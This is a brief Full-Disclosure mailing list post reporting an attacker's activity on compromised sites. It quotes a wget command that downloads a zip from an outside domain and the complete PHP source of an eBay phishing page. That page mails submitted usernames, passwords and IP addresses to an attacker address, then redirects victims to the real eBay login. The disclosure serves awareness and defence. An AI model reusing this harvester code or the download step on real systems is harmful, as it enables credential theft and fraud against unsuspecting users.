> Someone is bored and out making the rounds exploiting random asp pages and web-services.
wget http://www.adehkz.net/eb.zip <?php session_start(); $userid = $_POST['userid']; $password = $_POST['password']; $ip = getenv("REMOTE_ADDR"); $subj = "eB - $userid"; $msg = "Username: $userid\nPassword: $password\n....\nIP: $ip"; mail("[email protected]", $subj, $msg); header("Location: https://signin.ebay.com/ws/eBayISAPI.dll?SignIn&errmsg=8&pUserId=&co_partnerId=2&siteid=0&pageType=1883&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http%3A%2F%2Fmy.ebay.com%2Fws%2FeBayISAPI.dll%3FMyeBay&pp=&migrateVisitor=1 "); ?> I passed this on to the SANS handlers a few days ago but the site is still up and running. Enjoy -KF _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
